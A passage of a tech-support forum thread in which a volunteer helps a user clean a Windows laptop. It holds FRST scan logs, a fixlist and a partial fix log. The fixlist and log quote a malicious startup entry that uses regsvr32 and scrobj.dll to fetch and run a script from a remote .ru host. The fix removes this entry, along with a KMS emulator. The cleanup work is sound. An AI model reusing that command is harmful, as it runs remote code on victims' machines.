FirewallRules: [{EB7199FD-A434-4F0A-961F-2B7D15046C3A}] => (Allow) C:\Users\Gaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{0301DF89-2FCB-4543-B9F2-0A4B56F54463}] => (Allow) C:\Users\Gaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [{6A1525A1-B726-427D-BFBC-93E061C8D4C0}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{C840D465-5EAA-4F53-BED4-7E482AD0321C}] => (Allow) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
FirewallRules: [{BAD93C08-C447-4750-B48F-F13123F9BE2A}] => (Allow) LPort=1900
FirewallRules: [{891EB9F3-7246-480F-83B7-91DA9A0EABDD}] => (Allow) LPort=2869
FirewallRules: [{F60BA5C2-4115-4761-BD74-603CA20AD331}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{A14ADB91-BD61-41D6-9D10-5AEFA467A5A7}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{A2E245AB-ACB5-425C-889A-954BEFF15221}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{81CDFDBC-F47C-4AF8-99F1-F67A6D6A1870}] => (Allow) C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{613EA8A0-A8F0-4795-A483-C06A31FC760C}] => (Allow) C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{73123AF8-D00F-4D52-B5B2-9EED1AA52B61}] => (Allow) C:\Users\Ligaya\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{26E4F075-5B2E-47B9-9C5A-13D314EA1312}] => (Allow) C:\Users\Ligaya\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{62E40FF5-1235-408A-BA03-16590FCF5D63}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5CAD92DD-59E6-4C38-B62E-06EAC13A7FB2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{154A0093-AA20-4781-99A1-9A0205E31C5A}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{A6D4F2C6-A315-4E0E-A991-7B3C0850B34D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{F0206348-A801-46F0-98B1-2700287BF2B5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
02-08-2017 06:30:20 Windows Update
05-08-2017 19:57:56 Windows Update
09-08-2017 15:44:51 Windows Update
13-08-2017 10:00:15 Windows Update
16-08-2017 20:30:01 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/19/2017 08:31:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Setup.exe_Microsoft Setup Bootstrapper, version: 14.0.4734.1000, time stamp: 0x4b581e85
Faulting module name: OSETUP.DLL, version: 14.0.4734.1000, time stamp: 0x4b581ebc
Exception code: 0xc0000417
Fault offset: 0x002f6433
Faulting process id: 0x5c8
Faulting application start time: 0x01d3188290dcdcc7
Faulting application path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
Faulting module path: C:\Users\Ligaya\AppData\Local\Temp\Setup000005c8\OSETUP.DLL
Report Id: cf862536-8475-11e7-8231-7845c4c1808f
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 08:31:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Setup.exe_Microsoft Setup Bootstrapper, version: 14.0.4734.1000, time stamp: 0x4b581e85
Faulting module name: OSETUP.DLL, version: 14.0.4734.1000, time stamp: 0x4b581ebc
Exception code: 0xc0000417
Fault offset: 0x002f6433
Faulting process id: 0xbbc
Faulting application start time: 0x01d318828ac0c1d6
Faulting application path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
Faulting module path: C:\Users\Ligaya\AppData\Local\Temp\Setup00000bbc\OSETUP.DLL
Report Id: c9a0e111-8475-11e7-8231-7845c4c1808f
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 08:28:27 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 08:28:08 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 08:09:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\AVAST Software\Avast\setup\iplugins\IStats.dll".
Dependent Assembly Avast.VC110.CRT,processorArchitecture="x86",publicKeyToken="2036b14a11e83e4a",type="win32",version="11.0.60610.1" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/19/2017 03:52:58 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office Office 64-bit Components 2010 - Update 'Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (08/19/2017 03:52:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x179c
Faulting application start time: 0x01d3185b8fd5a323
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: d4e9e9fd-844e-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 03:52:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x1708
Faulting application start time: 0x01d3185b8adc3dbd
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: cd5c0908-844e-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (08/19/2017 02:21:45 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office Office 64-bit Components 2010 - Update 'Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (08/19/2017 02:21:44 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsiExec.exe, version: 5.0.9600.18333, time stamp: 0x572b8067
Faulting module name: msvcrt.dll, version: 7.0.9600.17415, time stamp: 0x545055fe
Exception code: 0xc00000fd
Fault offset: 0x00000000000022a3
Faulting process id: 0x378
Faulting application start time: 0x01d3184ec556a9fa
Faulting application path: C:\Windows\System32\MsiExec.exe
Faulting module path: C:\WINDOWS\system32\msvcrt.dll
Report Id: 164afdc0-8442-11e7-822f-606c66264890
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:24:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:21:55 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:19:57 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:19:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (08/19/2017 09:18:06 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (08/19/2017 09:17:48 AM) (Source: DCOM) (EventID: 10005) (User: DELL)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
 
 
CodeIntegrity:
===================================
  Date: 2017-08-19 09:23:39.189
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-19 09:23:38.726
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-19 02:23:53.899
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 19:33:40.531
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 13:00:04.180
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-17 11:30:31.160
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-14 18:48:17.938
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-14 12:52:51.941
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-13 10:06:01.716
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-08-10 17:10:44.121
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-3337U CPU @ 1.80GHz
Percentage of memory in use: 46%
Total physical RAM: 3993.09 MB
Available physical RAM: 2138.37 MB
Total Virtual: 4825.09 MB
Available Virtual: 3351.12 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:248.95 GB) (Free:175.43 GB) NTFS
Drive f: (Hunter) (Fixed) (Total:439.45 GB) (Free:46.2 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 4E744ED0)
 
Partition: GPT.
 
==================== End of Addition.txt ============================
 
#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,962 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:12:16 PM

Posted 19 August 2017 - 10:00 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
C:\windows\kmsemulator.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as a Java update!
Important: read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates, remove these old version(s) via the Control Panel > Programs > Programs and Features.
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation)

Please post the Fixlog.txt and let me know if the problem persists.

#3 Gaya19
  • Topic Starter
  • Members
  • 3 posts

Posted 21 August 2017 - 10:17 PM

Hi Nasdaq! Thanks so much for your time and help. Here are the contents of the Fixlog.txt.

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Ran by Ligaya (22-08-2017 10:47:58) Run:1
Running from C:\Users\Ligaya\Desktop
Loaded Profiles: Ligaya (Available Profiles: UpdatusUser & Ligaya)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
FirewallRules: [UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
C:\windows\kmsemulator.exe
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => value removed successfully
Could not restore Default URLSearchHook.
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value removed successfully
HKLM\Software\Classes\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found. 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => value not found.
HKLM\Software\Classes\CLSID\{47833539-D0C5-4125-9FA8-0819E2EAAC93} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\skype4com => key removed successfully
HKLM\Software\Classes\CLSID\{FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} => key not found. 
HKLM\Software\Wow6432Node\Mozilla\Thunderbird\Extensions\\msktbird@mcafee.com => value removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Mozilla\Firefox\Extensions\\{e4f94d1e-2f53-401e-8885-681602c0ddd8} => value not found.
